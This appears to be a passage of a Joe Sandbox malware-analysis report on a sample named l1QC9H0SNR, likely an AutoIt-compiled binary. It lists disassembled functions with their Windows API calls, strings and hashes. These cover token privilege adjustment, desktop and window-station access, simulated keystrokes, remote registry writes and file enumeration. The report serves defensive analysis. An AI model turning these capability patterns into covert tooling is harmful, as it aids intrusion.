                                              • API String ID: 3188754299-0
                                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction ID: 2253cc8459ca1d491c809f17296f988ba5cca3a2efdf996f0537d2947e220cda
                                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction Fuzzy Hash: 1DD0A77090520CEBDB10CFB8DC049EE73A8D705320F004798FD59C32C1D535A9409750
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: ae5fdbd9bffaeb62f312959acb3d908732e55506f676240291793ee9d057d1f6
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 4EB0927644020C77CE112A82EC02A493B5D9B41764F408060FB1C18162A6B3A6649A89
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00BBD1FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 3b133604e3c35b8b6c7507b89bef6b0e4b915d07d35fc4973e0e4ebff91d79e7
                                              • Instruction ID: ff2afaa97fceddfaf176cd2d2c7d83306ca91fb99c7e287733f5976e3de96f1c
                                              • Opcode Fuzzy Hash: 3b133604e3c35b8b6c7507b89bef6b0e4b915d07d35fc4973e0e4ebff91d79e7
                                              • Instruction Fuzzy Hash: 9C718F702047428FC714EF68C491AAAB7E0EF89355F0449EDF8969B3A1DB74ED09CB52
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01009961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: a5ad71b3c69aa147feeb2c73f4610c21f3117544286a7e26f7a21db9a2cf9c13
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 3FE0E67494410EDFDB00EFF8D5496DE7FB4EF04301F100161FD05D2281DA309D508A62
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00BDCB37
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCB95
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDCBD6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCC00
                                              • SendMessageW.USER32 ref: 00BDCC29
                                              • _wcsncpy.LIBCMT ref: 00BDCC95
                                              • GetKeyState.USER32(00000011), ref: 00BDCCB6
                                              • GetKeyState.USER32(00000009), ref: 00BDCCC3
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCCD9
                                              • GetKeyState.USER32(00000010), ref: 00BDCCE3
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCD0C
                                              • SendMessageW.USER32 ref: 00BDCD33
                                              • SendMessageW.USER32(?,00001030,?,00BDB348), ref: 00BDCE37
                                              • SetCapture.USER32(?), ref: 00BDCE69
                                              • ClientToScreen.USER32(?,?), ref: 00BDCECE
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BDCEF5
                                              • ReleaseCapture.USER32 ref: 00BDCF00
                                              • GetCursorPos.USER32(?), ref: 00BDCF3A
                                              • ScreenToClient.USER32(?,?), ref: 00BDCF47
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDCFA3
                                              • SendMessageW.USER32 ref: 00BDCFD1
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD00E
                                              • SendMessageW.USER32 ref: 00BDD03D
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BDD05E
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BDD06D
                                              • GetCursorPos.USER32(?), ref: 00BDD08D
                                              • ScreenToClient.USER32(?,?), ref: 00BDD09A
                                              • GetParent.USER32(?), ref: 00BDD0BA
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDD123
                                              • SendMessageW.USER32 ref: 00BDD154
                                              • ClientToScreen.USER32(?,?), ref: 00BDD1B2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BDD1E2
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD20C
                                              • SendMessageW.USER32 ref: 00BDD22F
                                              • ClientToScreen.USER32(?,?), ref: 00BDD281
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BDD2B5
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDD351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 302779176-4164748364
                                              • Opcode ID: 6f1ed162aec4cf2a3655625d9093067b0dbc20986c11b6d92f324096891e48e5
                                              • Instruction ID: d06289ca1c0c7b3196f5f841f48bff2ef0cc24384dc1da856810b8d2fcf3e622
                                              • Opcode Fuzzy Hash: 6f1ed162aec4cf2a3655625d9093067b0dbc20986c11b6d92f324096891e48e5
                                              • Instruction Fuzzy Hash: 0742BC74209246AFDB24CF28C884BAAFFE5FF49310F14459AF696873A0E731D845DB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                              • API String ID: 1357608183-1798697756
                                              • Opcode ID: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                              • Instruction ID: beb77bf9a6d616040578a70228f72fec8323b96cdef5f26b7808fd36ee06772a
                                              • Opcode Fuzzy Hash: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                              • Instruction Fuzzy Hash: 2593A171A48215DFDB24CF98C881BADB7F1FF49714F2485AAE945AB380E7749E81CB40
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 00B548DF
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B8D665
                                              • IsIconic.USER32(?), ref: 00B8D66E
                                              • ShowWindow.USER32(?,00000009), ref: 00B8D67B
                                              • SetForegroundWindow.USER32(?), ref: 00B8D685
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8D69B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B8D6A2
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8D6AE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6BF
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6C7
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B8D6CF
                                              • SetForegroundWindow.USER32(?), ref: 00B8D6D2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6E7
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D6F2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6FC
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D701
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D70A
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D70F
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D719
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D71E
                                              • SetForegroundWindow.USER32(?), ref: 00B8D721
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00B8D748
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                              • Instruction ID: ce7157f824bea81dc180b1668a9aa3e8450b7f98420302dd107e3e643f4f4b30
                                              • Opcode Fuzzy Hash: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                              • Instruction Fuzzy Hash: 59317771A453187AEB206F619C89F7F7F6CEB44B50F104066FA05EB1E1DA705D00EBA0
                                              APIs
                                                • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                              • _memset.LIBCMT ref: 00BA8353
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BA83A5
                                              • CloseHandle.KERNEL32(?), ref: 00BA83B6
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA83CD
                                              • GetProcessWindowStation.USER32 ref: 00BA83E6
                                              • SetProcessWindowStation.USER32(00000000), ref: 00BA83F0
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA840A
                                                • Part of subcall function 00BA81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                                • Part of subcall function 00BA81CB: CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: e8a5800ba4b2c2148123d61f7bfa549c7e68b65abf8c015c768b14853b3e0838
                                              • Instruction ID: e2e797c9590b33d9d85ce170dbedc62a5606bd4c5885aac5af0b669dfb8f1c12
                                              • Opcode Fuzzy Hash: e8a5800ba4b2c2148123d61f7bfa549c7e68b65abf8c015c768b14853b3e0838
                                              • Instruction Fuzzy Hash: 9B814B71D09209AFDF119FA4CC45AEEBBF9EF05304F1481AAFD15A6661EB318E14DB20
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBC78D
                                              • FindClose.KERNEL32(00000000), ref: 00BBC7E1
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC806
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC81D
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC844
                                              • __swprintf.LIBCMT ref: 00BBC890
                                              • __swprintf.LIBCMT ref: 00BBC8D3
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • __swprintf.LIBCMT ref: 00BBC927
                                                • Part of subcall function 00B73698: __woutput_l.LIBCMT ref: 00B736F1
                                              • __swprintf.LIBCMT ref: 00BBC975
                                                • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B73713
                                                • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B7372B
                                              • __swprintf.LIBCMT ref: 00BBC9C4
                                              • __swprintf.LIBCMT ref: 00BBCA13
                                              • __swprintf.LIBCMT ref: 00BBCA62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 59f98f273bdf7acc2e7eaa23f519b74e24d8984ad04622f7aa4d41d5a6bee064
                                              • Instruction ID: 176cd7363fccc651d794aeca97498ee8b67e3c9d0d8229cb1da0fb610288eb05
                                              • Opcode Fuzzy Hash: 59f98f273bdf7acc2e7eaa23f519b74e24d8984ad04622f7aa4d41d5a6bee064
                                              • Instruction Fuzzy Hash: F1A11FB1508305ABC710EF94CC95EBFB7ECEF98701F4049A9F99586191EB35DA08CB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00BBEFB6
                                              • _wcscmp.LIBCMT ref: 00BBEFCB
                                              • _wcscmp.LIBCMT ref: 00BBEFE2
                                              • GetFileAttributesW.KERNEL32(?), ref: 00BBEFF4
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00BBF00E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF026
                                              • FindClose.KERNEL32(00000000), ref: 00BBF031
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF04D
                                              • _wcscmp.LIBCMT ref: 00BBF074
                                              • _wcscmp.LIBCMT ref: 00BBF08B
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF09D
                                              • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF0BB
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF0C5
                                              • FindClose.KERNEL32(00000000), ref: 00BBF0D2
                                              • FindClose.KERNEL32(00000000), ref: 00BBF0E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                              • Instruction ID: e59da4f38bbdfa7f468280c9c39da89e82ab13376215a8fa98f9fdc17788d1cb
                                              • Opcode Fuzzy Hash: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                              • Instruction Fuzzy Hash: 9631F03250520A6BDB14AFA4DC59AFEB7ECDF48360F0441B2F845E30A1EFB0DA44CA64
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD0953
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDF910,00000000,?,00000000,?,?), ref: 00BD09C1
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BD0A09
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BD0A92
                                              • RegCloseKey.ADVAPI32(?), ref: 00BD0DB2
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD0DBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: 66ec5299bade343ad993e1ad1be2ed6989493bef3820871e5530437cd32a64f5
                                              • Instruction ID: f07defda9d4ccd3e9f470572bb884fbde672b96a571506c22aa275710b47653d
                                              • Opcode Fuzzy Hash: 66ec5299bade343ad993e1ad1be2ed6989493bef3820871e5530437cd32a64f5
                                              • Instruction Fuzzy Hash: 500238756146019FCB14EF24C891E2AB7E5FF89314F0485ADF89A9B3A2DB30ED45CB81
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • DragQueryPoint.SHELL32(?,?), ref: 00BDC627
                                                • Part of subcall function 00BDAB37: ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                • Part of subcall function 00BDAB37: GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                • Part of subcall function 00BDAB37: PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC690
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BDC69B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BDC6BE
                                              • _wcscat.LIBCMT ref: 00BDC6EE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BDC705
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC71E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC735
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC757
                                              • DragFinish.SHELL32(?), ref: 00BDC75E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00BDC851
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 2166380349-3440237614
                                              • Opcode ID: 89b7dbe5146dd2bb2301adc2d838f344b30f99535ccf8b03671099a9d23afafb
                                              • Instruction ID: 968dd062ef46fc255852b41928ddc9391b34680786a4e587bffaa44d6794cb34
                                              • Opcode Fuzzy Hash: 89b7dbe5146dd2bb2301adc2d838f344b30f99535ccf8b03671099a9d23afafb
                                              • Instruction Fuzzy Hash: 1D617D71508301AFC701DF64DC95EAFBBE8EF89310F00496EF595972A1EB309A49CB52
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00BBF113
                                              • _wcscmp.LIBCMT ref: 00BBF128
                                              • _wcscmp.LIBCMT ref: 00BBF13F
                                                • Part of subcall function 00BB4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BB43A0
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF16E
                                              • FindClose.KERNEL32(00000000), ref: 00BBF179
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF195
                                              • _wcscmp.LIBCMT ref: 00BBF1BC
                                              • _wcscmp.LIBCMT ref: 00BBF1D3
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF1E5
                                              • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF203
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF20D
                                              • FindClose.KERNEL32(00000000), ref: 00BBF21A
                                              • FindClose.KERNEL32(00000000), ref: 00BBF22C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
